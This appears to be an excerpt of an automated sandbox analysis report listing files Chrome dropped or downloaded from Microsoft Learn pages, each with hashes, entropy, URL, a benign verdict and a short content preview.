                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1154
                                                                                                                                                                                                                      Entropy (8bit):4.59126408969148
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                                      MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                                      SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                                      SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                                      SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3130
                                                                                                                                                                                                                      Entropy (8bit):4.790069981348324
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                                      MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                                      SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                                      SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                                      SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15427
                                                                                                                                                                                                                      Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                      MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                      SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                      SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                      SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                      Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):464328
                                                                                                                                                                                                                      Entropy (8bit):5.074669864961383
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                                                                      MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                                                                      SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                                                                      SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                                                                      SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                                                                      Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):207935
                                                                                                                                                                                                                      Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                      MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                      SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                      SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                      SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18477
                                                                                                                                                                                                                      Entropy (8bit):5.147347768532056
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                                      MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                                      SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                                      SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                                      SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):207935
                                                                                                                                                                                                                      Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                      MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                      SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                      SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                      SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                                      Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):18477
                                                                                                                                                                                                                      Entropy (8bit):5.147347768532056
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                                      MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                                      SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                                      SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                                      SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                                      Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):15427
                                                                                                                                                                                                                      Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                      MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                      SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                      SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                      SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):52717
                                                                                                                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1432
                                                                                                                                                                                                                      Entropy (8bit):4.986131881931089
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                                      MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                                      SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                                      SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                                      SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                                      Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):52717
                                                                                                                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1173007
                                                                                                                                                                                                                      Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                      MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                      SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                      SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                      SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                      Malicious:false
